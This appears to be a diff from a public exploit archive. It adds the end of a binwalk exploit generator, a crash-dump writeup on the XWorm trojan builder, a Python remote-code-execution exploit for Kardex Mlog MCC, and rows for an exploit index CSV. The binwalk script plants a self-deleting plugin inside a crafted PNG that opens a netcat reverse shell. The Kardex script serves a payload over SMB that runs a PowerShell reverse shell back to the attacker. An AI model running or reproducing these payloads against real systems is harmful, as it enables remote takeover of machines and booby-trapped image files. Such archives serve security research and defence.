header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e")
lines = ['import binwalk.core.plugin\n','import os\n', 'import shutil\n','class MaliciousExtractor(binwalk.core.plugin.Plugin):\n',' def init(self):\n',' if not os.path.exists("/tmp/.binwalk"):\n',' os.system("nc ',str(args.ip)+' ',str(args.port)+' ','-e /bin/bash 2>/dev/null &")\n',' with open("/tmp/.binwalk", "w") as f:\n',' f.write("1")\n',' else:\n',' os.remove("/tmp/.binwalk")\n', ' os.remove(os.path.abspath(__file__))\n',' shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n']
in_file = open(args.file, "rb")
data = in_file.read()
in_file.close()
with open("/tmp/plugin", "w") as f:
for line in lines:
f.write(line)
with open("/tmp/plugin", "rb") as f:
content = f.read()
os.system("rm /tmp/plugin")
with open("binwalk_exploit.png", "wb") as f:
f.write(data)
f.write(header_pfs)
f.write(content)
print("")
print("You can now rename and share binwalk_exploit and start your local netcat listener.")
print("")

224
exploits/windows/dos/51265.txt Normal file
View file

@ -0,0 +1,224 @@
#Exploit Author: XWorm Trojan 2.1 - Null Pointer Derefernce DoS
# Exploit Author: TOUHAMI KASBAOUI
# Vendor Homepage: https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/
# Software Link: N/A# Version: 2.1# Tested on: Windows 10
# CVE : N/A
==================================================================
THE BUG : NULL pointer dereference -> DOS crash
==================================================================
The sophisticated XWorm Trojan is well exploited by EvilCoder, where they collect different features such as ransomware and keylogger TAs to make it more risky for victims. The Trojan assigned to victims suffers from a NULL pointer deference vulnerability, which could lead to a denial of service for the server builder of the threat actor by getting his IP address and port of command and control.
==================================================================
WINDBG ANALYSIS AFTER SENDING 1000 'A' BYTES
==================================================================
(160.b98): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0330c234 ebx=0113e8d4 ecx=00000000 edx=018c0000 esi=0330c234 edi=0113e55c
eip=078f5a59 esp=0113e4f8 ebp=0113e568 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
builder!XWorm.Client.isDisconnected+0xa9:
078f5a59 8b01            mov     eax,dword ptr [ecx]  ds:002b:00000000=????????
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************
MethodDesc:   055a86b4
Method Name:  XWorm.Client.isDisconnected()
Class:        09fe9634
MethodTable:  055a86d8
mdToken:      06000730
Module:       01464044
IsJitted:     yes
CodeAddr:     078f59b0
Transparency: Critical
MethodDesc:   055a86b4
Method Name:  XWorm.Client.isDisconnected()
Class:        09fe9634
MethodTable:  055a86d8
mdToken:      06000730
Module:       01464044
IsJitted:     yes
CodeAddr:     078f59b0
Transparency: Critical
Failed to request MethodData, not in JIT code range
KEY_VALUES_STRING: 1
    Key  : AV.Dereference
    Value: NullPtr
    Key  : AV.Fault
    Value: Read
    Key  : Analysis.CPU.mSec
    Value: 6406
    Key  : Analysis.DebugAnalysisManager
    Value: Create
    Key  : Analysis.Elapsed.mSec
    Value: 12344
    Key  : Analysis.IO.Other.Mb
    Value: 152
    Key  : Analysis.IO.Read.Mb
    Value: 3
    Key  : Analysis.IO.Write.Mb
    Value: 181
    Key  : Analysis.Init.CPU.mSec
    Value: 48905
    Key  : Analysis.Init.Elapsed.mSec
    Value: 6346579
    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 200
    Key  : CLR.BuiltBy
    Value: NET48REL1LAST_C
    Key  : CLR.Engine
    Value: CLR
    Key  : CLR.Version
    Value: 4.8.4515.0
    Key  : Timeline.OS.Boot.DeltaSec
    Value: 7496
    Key  : Timeline.Process.Start.DeltaSec
    Value: 6371
    Key  : WER.OS.Branch
    Value: vb_release
    Key  : WER.OS.Timestamp
    Value: 2019-12-06T14:06:00Z
    Key  : WER.OS.Version
    Value: 10.0.19041.1
    Key  : WER.Process.Version
    Value: 2.1.0.0
NTGLOBALFLAG:  0
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS:  0
EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 078f5a59 (builder!XWorm.Client.isDisconnected+0x000000a9)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000000
Attempt to read from address 00000000
FAULTING_THREAD:  00000b98
PROCESS_NAME:  builder.exe
READ_ADDRESS:  00000000
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR:  c0000005
EXCEPTION_PARAMETER1:  00000000
EXCEPTION_PARAMETER2:  00000000
IP_ON_HEAP:  078f5a59
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.
STACK_TEXT:  
0113e568 73140556     00000000 00000000 00000000 builder!XWorm.Client.isDisconnected+0xa9
0113e574 7314373a     0113e8d4 0113e5b8 732dd3f0 clr!CallDescrWorkerInternal+0x34
0113e5c8 7321f0d1     c887551e 00000000 0335b7dc clr!CallDescrWorkerWithHandler+0x6b
0113e608 7321f1d6     731d7104 0335b7dc 055ab280 clr!CallDescrWorkerReflectionWrapper+0x55
0113e90c 7212853c     00000000 0330a1dc 00000000 clr!RuntimeMethodHandle::InvokeMethod+0x838
0113e930 72114a9d     00000000 00000000 00000000 mscorlib_ni!
0113e94c 6e14bf55     00000000 00000000 00000000 mscorlib_ni!
0113e968 6e14be68     00000000 00000000 00000000 System_Windows_Forms_ni!
0113e990 72118604     00000000 00000000 00000000 System_Windows_Forms_ni!
0113e9f4 72118537     00000000 00000000 00000000 mscorlib_ni!
0113ea08 721184f4     00000000 00000000 00000000 mscorlib_ni!
0113ea24 6e14bdfa     00000000 00000000 00000000 mscorlib_ni!
0113ea40 6e14bb9a     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ea80 6e13b07f     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eacc 6e144931     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ead8 6e1445f7     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eaec 6e13af53     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eaf4 6e13aee5     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eb08 6e13a820     00000000 00000000 00000000 System_Windows_Forms_ni!
0113eb58 0146d08e     00000000 00000000 00000000 System_Windows_Forms_ni!
WARNING: Frame IP not in any known module. Following frames may be wrong.
0113eb8c 7650148b     000606f4 0000c250 00000000 0x146d08e
0113ebb8 764f844a     05823e56 000606f4 0000c250 USER32!_InternalCallWinProc+0x2b
0113ec9c 764f61ba     05823e56 00000000 0000c250 USER32!UserCallWinProcCheckWow+0x33a
0113ed10 764f5f80     0113ed98 0113ed58 6e19e5ed USER32!DispatchMessageWorker+0x22a
0113ed1c 6e19e5ed     0113ed98 c9b28348 731410fc USER32!DispatchMessageW+0x10
0113ed58 6e14b44f     00000000 00000000 00000000 System_Windows_Forms_ni+0x22e5ed
0113eddc 6e14b03d     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ee30 6e14ae93     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ee5c 014b2694     00000000 00000000 00000000 System_Windows_Forms_ni!
0113ee84 014b2211     00000000 00000000 00000000 0x14b2694
0113eeac 014b1871     00000000 00000000 00000000 0x14b2211
0113eef8 014b08b7     00000000 00000000 00000000 0x14b1871
0113ef28 73140556     00000000 00000000 00000000 builder!XWorm.My.MyApplication.Main+0x6f
0113ef34 7314373a     0113efc4 0113ef78 732dd3f0 clr!CallDescrWorkerInternal+0x34
0113ef88 73149adb     00000000 030622ec 73171e90 clr!CallDescrWorkerWithHandler+0x6b
0113eff0 732bff7b     0113f0cc c8874202 01466f94 clr!MethodDescCallSite::CallTargetWorker+0x16a
0113f114 732c065a     0113f158 00000000 c8874096 clr!RunMain+0x1b3
0113f380 732c0587     00000000 c8874b72 00700000 clr!Assembly::ExecuteMainMethod+0xf7
0113f864 732c0708     c8874baa 00000000 00000000 clr!SystemDomain::ExecuteMainMethod+0x5ef
0113f8bc 732c082e     c8874bea 00000000 732bc210 clr!ExecuteEXE+0x4c
0113f8fc 732bc235     c8874a2e 00000000 732bc210 clr!_CorExeMainInternal+0xdc
0113f938 7398fa84     84112dff 73a24330 7398fa20 clr!_CorExeMain+0x4d
0113f970 73a1e81e     73a24330 73980000 0113f998 mscoreei!_CorExeMain+0xd6
0113f980 73a24338     73a24330 76b600f9 00f94000 MSCOREE!ShellShim__CorExeMain+0x9e
0113f998 76b600f9     00f94000 76b600e0 0113f9f4 MSCOREE!_CorExeMain_Exported+0x8
0113f998 77997bbe     00f94000 3d39c64a 00000000 KERNEL32!BaseThreadInitThunk+0x19
0113f9f4 77997b8e     ffffffff 779b8d3f 00000000 ntdll!__RtlUserThreadStart+0x2f
0113fa04 00000000     00000000 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b
STACK_COMMAND:  ~0s ; .cxr ; kb
SYMBOL_NAME:  builder!XWorm.Client.isDisconnected+a9
MODULE_NAME: builder
IMAGE_NAME:  builder.exe
FAILURE_BUCKET_ID:  NULL_POINTER_READ_c0000005_builder.exe!XWorm.Client.isDisconnected
OS_VERSION:  10.0.19041.1
BUILDLAB_STR:  vb_release
OSPLATFORM_TYPE:  x86
OSNAME:  Windows 10
IMAGE_VERSION:  2.1.0.0
FAILURE_ID_HASH:  {ab0d02c5-881b-c628-2858-a241c5c41b1f}
Followup:     MachineOwner
---------
TS: Exploitable - Data from Faulting Address controls Code Flow starting at builder!XWorm.Client.isDisconnected+0x00000000000000a9 (Hash=0xc8c3bc2d.0x7badd95a)

106
exploits/windows/remote/51239.py Executable file
View file

@ -0,0 +1,106 @@
#!/usr/bin/env python3
# Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)
# Date: 12/13/2022
# Exploit Author: Patrick Hener
# Vendor Homepage: https://www.kardex.com/en/mlog-control-center
# Version: 5.7.12+0-a203c2a213-master
# Tested on: Windows Server 2016
# CVE : CVE-2023-22855
# Writeup: https://hesec.de/posts/CVE-2023-22855
#
# You will need to run a netcat listener beforehand: ncat -lnvp <port>
#
import requests, argparse, base64, os, threading
from impacket import smbserver
def probe(target):
headers = {
"Accept-Encoding": "deflate"
}
res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers)
if "fonts" in res.text:
return True
else:
return False
def gen_payload(lhost, lport):
rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'
rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE'))
payload = f"""<#@ template language="C#" #>
<#@ Import Namespace="System" #>
<#@ Import Namespace="System.Diagnostics" #>
<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e {rev_shell_blob_b64.decode()}";
proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#>"""
return payload
def start_smb_server(lhost):
server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
server.addShare("SHARE", os.getcwd(), '')
server.setSMB2Support(True)
server.setSMBChallenge('')
server.start()
def trigger_vulnerability(target, lhost):
headers = {
"Accept-Encoding": "deflate"
}
requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers)
def main():
# Well, args
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', help='Target host url', required=True)
parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True)
parser.add_argument('-p', '--lport', help='Attacker listening port', required=True)
args = parser.parse_args()
# Probe if target is vulnerable
print("[*] Probing target")
if probe(args.target):
print("[+] Target is alive and File Inclusion working")
else:
print("[-] Target is not alive or File Inclusion not working")
exit(-1)
# Write payload to file
print("[*] Writing 'exploit.t4' payload to be included later on")
with open("exploit.t4", 'w') as template:
template.write(gen_payload(args.lhost, args.lport))
template.close()
# Start smb server in background
print("[*] Starting SMB Server in the background")
smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,))
smb_server_thread.start()
# Rev Shell reminder
print("[!] At this point you should have spawned a rev shell listener")
print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'")
print("[?] Are you ready to trigger the vuln? Then press enter!")
input() # Wait for input then continue
# Trigger vulnerability
print("[*] Now triggering the vulnerability")
trigger_vulnerability(args.target, args.lhost)
# Exit
print("[+] Enjoy your shell. Bye!")
os._exit(1)
if __name__ == "__main__":
main()

29
files_exploits.csv
View file

@ -2892,6 +2892,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,,2018-02-28,2018-02-28,0,CVE-2016-1887,,,,,https://cturt.github.io/sendmsg.html
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-05,0,CVE-2023-0744,,,,,
7060,exploits/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,dos,hardware,,2008-11-07,,1,OSVDB-60243;CVE-2008-6605;OSVDB-49835,,,,,
2246,exploits/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,dos,hardware,,2006-08-21,,1,OSVDB-28171;CVE-2009-3962;CVE-2006-4523,,,,,
10182,exploits/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,dos,hardware,,2009-10-28,,1,,,,,,http://secunia.com/advisories/21583
@ -3489,6 +3490,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38720,exploits/hardware/remote/38720.txt,"D-Link DIR-817LW - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,OSVDB-130399,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
38719,exploits/hardware/remote/38719.txt,"D-Link DIR-818W - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
38718,exploits/hardware/remote/38718.txt,"D-Link DIR-825 (vC) - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,OSVDB-130403,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
51243,exploits/hardware/remote/51243.txt,"D-Link DIR-846 - Remote Command Execution (RCE) vulnerability",2023-04-05,"Françoa Taffarel",remote,hardware,,2023-04-05,2023-04-05,0,CVE-2022-46552,,,,,
38481,exploits/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",remote,hardware,,2013-04-19,2015-10-18,1,CVE-2013-3095;OSVDB-92550,,,,,https://www.securityfocus.com/bid/59312/info
38717,exploits/hardware/remote/38717.txt,"D-Link DIR-866L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
38725,exploits/hardware/remote/38725.txt,"D-Link DIR-880L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,OSVDB-130405;OSVDB-130400,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060
@ -3511,6 +3513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15842,exploits/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",remote,hardware,,2010-12-29,2011-09-18,1,OSVDB-70230,,,,,
9209,exploits/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,remote,hardware,,2009-07-19,2016-10-27,1,OSVDB-57143;CVE-2009-2766;CVE-2009-2765;OSVDB-55990;CVE-2008-6975;OSVDB-55636;CVE-2008-6974,,,,,
7389,exploits/hardware/remote/7389.html,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",remote,hardware,,2008-12-07,,1,CVE-2008-6975;CVE-2008-6974;OSVDB-55636,,,,,
51248,exploits/hardware/remote/51248.py,"Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure",2023-04-05,"Ken Pyle",remote,hardware,,2023-04-05,2023-04-05,0,CVE-2020-5330;CVE-2019-15993,,,,,
50880,exploits/hardware/remote/50880.txt,"Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
50878,exploits/hardware/remote/50878.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
50879,exploits/hardware/remote/50879.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
@ -3857,6 +3860,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38583,exploits/hardware/remote/38583.html,"Sony CH / DH Series IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-06-12,Castillo,remote,hardware,,2013-06-12,2015-10-31,1,CVE-2013-3539;OSVDB-94226,,,,,https://www.securityfocus.com/bid/60529/info
48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,,2020-10-01,2020-10-01,0,,,,,,
44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' 'setAttributeNodeNS' WebKit 5.02 / 'bpf' Kernel Loader 4.55",2018-02-27,Specter,remote,hardware,,2018-02-28,2018-04-25,0,,Console,,,,https://github.com/Cryptogenic/PS4-4.55-Kernel-Exploit/tree/bb0dfe821d94cb03491b0d4c5136cefd1624fc41
51259,exploits/hardware/remote/51259.txt,"SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow",2023-04-05,LiquidWorm,remote,hardware,,2023-04-05,2023-04-05,0,,,,,,
7055,exploits/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Configuration Download",2008-11-07,hkm,remote,hardware,,2008-11-06,,1,OSVDB-49870;CVE-2008-6916,,,,,
33938,exploits/hardware/remote/33938.txt,"Sterlite SAM300 AX Router - 'Stat_Radio' Cross-Site Scripting",2010-02-04,"Karn Ganeshen",remote,hardware,,2010-02-04,2014-07-01,1,CVE-2010-0607;OSVDB-62211,,,,,https://www.securityfocus.com/bid/39928/info
29666,exploits/hardware/remote/29666.rb,"Supermicro Onboard IPMI - 'close_window.cgi' Remote Buffer Overflow (Metasploit)",2013-11-18,Metasploit,remote,hardware,80,2013-11-18,2013-11-18,1,CVE-2013-3623;OSVDB-99598,"Metasploit Framework (MSF)",,,,
@ -5370,6 +5374,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36436,exploits/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",webapps,java,,2015-03-19,2015-03-19,0,CVE-2015-0514;OSVDB-117348,,,,,
36440,exploits/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",webapps,java,58080,2015-03-19,2015-03-19,0,CVE-2015-0516;OSVDB-117349,,,,,
44691,exploits/java/webapps/44691.txt,"ERPnext 11 - Cross-Site Scripting",2018-05-22,"Veerababu Penugonda",webapps,java,,2018-05-22,2018-05-22,0,CVE-2018-11339,,,,,
51255,exploits/java/webapps/51255.txt,"ERPNext 12.29 - Cross-Site Scripting (XSS)",2023-04-05,"Patrick Dean Ramos / Nathu Nandwani / Junnair Manla",webapps,java,,2023-04-05,2023-04-05,0,CVE-2022-28598,,,,,
48654,exploits/java/webapps/48654.txt,"Exhibitor Web UI 1.7.1 - Remote Code Execution",2020-07-07,"Logan Sanderson",webapps,java,,2020-07-09,2020-10-01,0,CVE-2019-5029,,,,,
26987,exploits/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,webapps,java,,2005-12-27,2013-07-21,1,CVE-2005-4576;OSVDB-21936,,,,,https://www.securityfocus.com/bid/16073/info
50131,exploits/java/webapps/50131.py,"ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)",2021-07-16,Photubias,webapps,java,,2021-07-16,2021-10-29,0,CVE-2021-35464,,,,,
@ -5418,6 +5423,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35683,exploits/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross-Site Scripting",2011-05-02,"Patrick Webster",webapps,java,,2011-05-02,2015-01-03,1,,,,,,https://www.securityfocus.com/bid/47672/info
47972,exploits/java/webapps/47972.txt,"Liferay CE Portal 6.0.2 - Remote Command Execution",2020-01-29,"Berk Dusunur",webapps,java,,2020-01-29,2020-01-29,0,,,,,,
18881,exploits/java/webapps/18881.txt,"Liferay Portal 6.0.x < 6.1 - Privilege Escalation",2012-05-13,"Jelmer Kuperus",webapps,java,,2012-05-15,2012-05-15,0,OSVDB-82028,,,,,
51244,exploits/java/webapps/51244.py,"Liferay Portal 6.2.5 - Insecure Permissions",2023-04-05,Fu2x2000,webapps,java,,2023-04-05,2023-04-05,0,CVE-2021-33990,,,,,
44945,exploits/java/webapps/44945.txt,"Liferay Portal < 7.0.4 - Server-Side Request Forgery",2018-06-26,"Mehmet Ince",webapps,java,80,2018-06-26,2018-06-26,0,,"Cross-Site Request Forgery (CSRF)",,,,
44019,exploits/java/webapps/44019.txt,"LogicalDOC Enterprise 7.7.4 - Directory Traversal",2018-02-12,LiquidWorm,webapps,java,,2018-02-12,2018-02-12,0,,,,,,
44021,exploits/java/webapps/44021.txt,"LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution",2018-02-12,LiquidWorm,webapps,java,,2018-02-12,2018-02-12,0,,,,,,
@ -6975,6 +6981,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47703,exploits/linux/local/47703.txt,"GNU Mailutils 3.7 - Privilege Escalation",2019-11-21,"Mike Gualtieri",local,linux,,2019-11-21,2019-11-21,0,CVE-2019-18862,,,,,
41154,exploits/linux/local/41154.sh,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-25,"Xiphos Research Ltd",local,linux,,2017-01-25,2017-01-25,1,,,screenroot.sh,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-25-at-220348.png,http://www.exploit-db.comscreen-4.5.0.tar.gz,
41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",local,linux,,2017-01-25,2018-01-18,1,,,,,http://www.exploit-db.comscreen-4.5.0.tar.gz,https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
51252,exploits/linux/local/51252.py,"GNU screen v4.9.0 - Privilege Escalation",2023-04-05,"Manuel Andreas",local,linux,,2023-04-05,2023-04-05,0,CVE-2023-24626,,,,,
479,exploits/linux/local/479.c,"GNU Sharutils 4.2.1 - Local Format String",2004-09-25,n4rk0tix,local,linux,,2004-09-24,2016-03-30,1,OSVDB-10255,,,,http://www.exploit-db.comsharutils-4.2.1.tar.gz,
44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,,2018-05-09,2018-05-09,0,CVE-2018-0494,,,,,http://seclists.org/fulldisclosure/2018/May/20
3154,exploits/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,local,linux,,2007-01-17,2011-09-15,1,OSVDB-33551;CVE-2007-0368,,,,http://www.exploit-db.commbsebbs-0.70.0.tar,
@ -9235,6 +9242,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8842,exploits/multiple/dos/8842.pl,"Apache mod_dav / svn - Remote Denial of Service",2009-06-01,kingcope,dos,multiple,,2009-05-31,,1,OSVDB-55057;CVE-2009-1955,,,,,
21575,exploits/multiple/dos/21575.txt,"Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",dos,multiple,,2002-06-22,2016-09-08,1,CVE-2002-0653;OSVDB-842,,,,,https://www.securityfocus.com/bid/5084/info
37487,exploits/multiple/dos/37487.txt,"Apache Sling - Denial of Service",2012-07-06,IOactive,dos,multiple,,2012-07-06,2015-07-04,1,CVE-2012-2138;OSVDB-83682,,,,,https://www.securityfocus.com/bid/54341/info
51262,exploits/multiple/dos/51262.py,"Apache Tomcat 10.1 - Denial Of Service",2023-04-05,"Cristian Giustini",dos,multiple,,2023-04-05,2023-04-05,0,CVE-2022-29885,,,,,
41668,exploits/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",dos,multiple,,2017-03-22,2017-04-20,0,CVE-2017-6192,,,,http://www.exploit-db.comapngdis-2.8-bin-linux.zip,
41670,exploits/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow (PoC)",2017-03-14,"Alwin Peppels",dos,multiple,,2017-03-22,2017-03-22,0,CVE-2017-6191,,,,http://www.exploit-db.comapngdis-2.8-bin-linux.zip,
41669,exploits/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",dos,multiple,,2017-03-22,2017-04-20,0,CVE-2017-6193,,,,http://www.exploit-db.comapngdis-2.8-bin-linux.zip,
@ -11169,6 +11177,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33653,exploits/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 - 'reloadFrame' Cross-Site Scripting",2010-02-18,"George Christopoulos",remote,multiple,,2010-02-18,2014-06-06,1,CVE-2010-0703;OSVDB-62482,,,,,https://www.securityfocus.com/bid/38308/info
46813,exploits/multiple/remote/46813.rb,"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,5432,2019-05-08,2019-05-08,1,CVE-2019-9193,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
50847,exploits/multiple/remote/50847.py,"PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)",2022-03-30,b4keSn4ke,remote,multiple,,2022-03-30,2022-03-30,0,CVE-20199193,,,,,
51247,exploits/multiple/remote/51247.py,"PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)",2023-04-05,"Paulo Trindade",remote,multiple,,2023-04-05,2023-04-05,0,CVE-20199193,,,,,
23385,exploits/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service - Cross-Site Scripting",2003-11-17,"Ziv Kamir",remote,multiple,,2003-11-17,2012-12-14,1,OSVDB-2824,,,,,https://www.securityfocus.com/bid/9055/info
8037,exploits/multiple/remote/8037.txt,"ProFTPd - 'mod_mysql' Authentication Bypass",2009-02-10,gat3way,remote,multiple,,2009-02-09,2016-10-27,1,OSVDB-51953;CVE-2009-0543;OSVDB-51849;CVE-2009-0542,,,,,
